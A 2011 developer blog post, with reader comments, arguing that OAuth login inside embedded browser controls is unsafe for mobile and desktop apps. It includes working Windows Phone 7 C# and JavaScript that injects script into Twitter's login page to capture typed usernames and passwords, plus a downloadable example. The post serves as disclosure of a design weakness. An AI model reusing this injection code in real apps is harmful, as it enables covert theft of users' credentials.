Nick's .NET Travels

Continually looking for the yellow brick road so I can catch me a wizard....

Hack: OAuth security flaw for Windows Phone 7, iPhone and other Mobile platforms

If you’ve ever had to work with one of the multitude of social networking sites out there (eg Facebook or Twitter) you’d be familiar with Oauth (official documentation is http://oauth.net/ but most sites have their own documentation too). For integrating these sites into a website Oauth seems to be relatively secure. There are a couple of implementations: OAuth 1, which Twitter currently uses which is a royal pain to implement, and then OAuth 2, which Facebook uses. What I’m going to show in this post is just how dangerous OAuth is for rich client applications (ie native applications for desktop and for most mobile platforms).

The original intent behind OAuth was good and noble. It stems from the lack of trust that users have for websites that prompt for a set of credentials that they don’t manage. For example if DodgyWebSite43.com asked for your Facebook credentials you won’t enter them would you! So the idea is to send the user off to Facebook to authenticate; once authenticated the user is returned to the original website along with a token that indicates they’re authenticated.

For rich client applications (in this example I’ll use a Windows Phone 7 application but the point I’m making is in no way an issue with the platform, rather than with OAuth as a protocol) the idea is that you display a web browser control (UIWebView if you’re in iOS-land) and direct the user to sign into the social network of your choice. Once they’re signed in the host application can extract the authenticated token. Again, the idea is that the application isn’t requesting the user’s credentials. In fact, the application shouldn’t be able to access the user’s credentials at any point in the process.

This is where things start to go pair-shaped. Nearly every rich client platform which has a web browser control that can be used to render web content within an application, also allows the host application to interact with the content. In most cases this can be used to invoke javascript. With some relatively basic manipulation of the HTML DOM you can easily, and I mean easily, extract any data that the user enters.

I’ll step through how I did this in my Windows Phone 7 application:

Step 1: Create the UI – some basic XAML to display a WebBrowser control

<phone:WebBrowser x:Name="Browser"
                     ScriptNotify="Browser_ScriptNotify"
                     IsScriptEnabled="True"
                     LoadCompleted="Browser_LoadCompleted" />
 

Notes: I’ve enabled scripts by setting IsScriptEnabled to true. I’ve attached an event handler to the LoadCompleted event; this will allow me to interact with the DOM once the page has rendered. I’ve also attached a handler to the ScriptNotify event; this will allow me to send data from javascript back out to the host application.

Step 2: Navigate to the login screen

void MainPage_Loaded(object sender, RoutedEventArgs e)
{     // Facebook OAuth login: eg http://www.facebook.com/dialog/oauth/?response_type=token...
     // Twitter login: eg mobile.twitter.com/session/new
     this.Browser.Navigate(new Uri("http://mobile.twitter.com/session/new"));
}
 

image

Notes: Running this you’ll see that the browser navigates to the Twitter sign in page – at this point the user is entering their credentials into the Twitter site. However, what they don’t realise is that the application could be sniffing the data they enter.

Step 3: Inject some Javascript

private void Browser_LoadCompleted(object sender, System.Windows.Navigation.NavigationEventArgs e)
{     try
     {
         Browser.InvokeScript("eval", "(function(){" +
             // Find all the input fields
             "var fields = document.getElementsByTagName('input');" +
             // Iterate through looking for text and password fields
             "for(var j=0;j<fields.length;j++){" +
                     "if(fields[j].type=='text' || fields[j].type=='password'){ " +
                         // Attach event handlers to retrieve the changed values
                         "fields[j].attachEvent('onchange',function(e){" +
                             "setTimeout('(function(){window.external.notify(\"' + e.srcElement.value + '\");})()',50);" +
                         "});" +
                 "}} " +
             "})()");
     }     catch     {     }
}
 

Notes: This block of code calls the javascript eval method, passing in a parameter that defines an entire javascript function. eval will interprete and execute that function; this pretty much allows you to run any javascript code you want. Hopefully the comments in the javascript should be enough for you to work out what it does up until the setTimeout method.

The window.external.notify javascript method is how we send data from javascript back out to the host wp7 application. When this method is invoked, it raises the ScriptNotify event on the WebBrowser control, passing the method parameter out into the event handler.

You might be asking why we don’t call window.external.notify directly at this point. Unfortunately if you do that you’ll never see the ScriptNotify event raised. I suspect that this is some sort of conflict occurring on the UI thread – essentially the onchange event is getting raised in javascript due to some UI event from the user (eg moving between fields); this in turn is trying to raise the ScriptNotify event on the UI thread of the browser, which is currently locked. Anyhow, we get around this by effectively delaying the window.external.notify method call by 50 milliseconds.

Step 4: User enters username and password

Notes: After each value is entered the ScriptNotify event is raised, passing out the data entered

Step 5: Extract the data returned from javascript

private void Browser_ScriptNotify(object sender, NotifyEventArgs e)
{     // Extract the exported data
     var txt = e.Value;
}
 

Notes: The variable txt holds the exported value from the text or password input field. The application can then do what it likes with those details.

 

When I run this application and enter values, each field I enter text into is exported (see the list of data values below the WebBrowser).

image

I’ve included this as a working example (don’t forget to unblock the file when you download it):

As you can see it is super easy for a rich client application to effectively steal user’s credentials whilst they are logging in via a WebBrowser control. The moral of this story is that OAuth should not be used for rich client applications and that the social networking sites need to mature and offer a secure mechanism for rich client applications to authenticate against their services without those applications accessing the users credentials directly.

Comments (3) -

  • Dirk de Kok

    3/27/2011 9:20:10 PM |

    yeah, the best and most secure way is to open up a browser window, let the user do the oAuth stuff in there and then afterwards let the browser startup the app again. You can do this on iOS by specifiying your own protocol (say myapp://) and using this in the redirect url.

    It is quite a pain though, app-browser-app is a big round trip, you have to maintain state in your app but mostly quite confusing for the end user. HelloInbox uses in-app browser oAuth, and haven't received any complains yet.

    A lot of it is trust, not just the technical details.

  • Nick

    3/27/2011 9:44:36 PM |

    Yes, most of it does come down to trust. However once some 3rd party applications abuse that trust both users and providers will move against OAuth for rich client apps.

    Unfortunately even your suggestion of opening the browser window is relatively easy to spoof for inexperience (naive) users. The only solution is actually to prompt the user to get them to open the browser, navigate to the provider website and sign in. Once signed in they should be prompted to permit the 3rd party app. They then close the browser and return to the 3rd party app. Horrible user experience but it would be relatively secure.

  • Nick

    3/29/2011 7:24:59 PM |

    Russ, you make a good point about launching the real web browser in order for the user to authenticate themselves. And this is definitely something I would suggest as a step in the right direction. That said, it's very easy for an application to spoof the web browser, sending them to the credential providers site to sign in. All of the security suggestions you made around the ssl can all been spoofed very easily to make it look like the native web browser on the platform.

    One way to improve the security would be to have the user launch the browser and navigate to the credential providers site. When they get there they approve the 3rd party app (they would be prompted by the credential provider to indicate there is an app waiting to be authorised) and then return to the 3rd party app. This removes the ability for the app to spoof the launching of the webbrowser.

    Unfortunately this scenario sux from a user experience point of view. And unfortunately due to most consumers being relatively naiive the tradeoff is just not worthwhile. That is until some major, public, accounts are hacked and users start to be more paranoid about these security flaws.

Comments are closed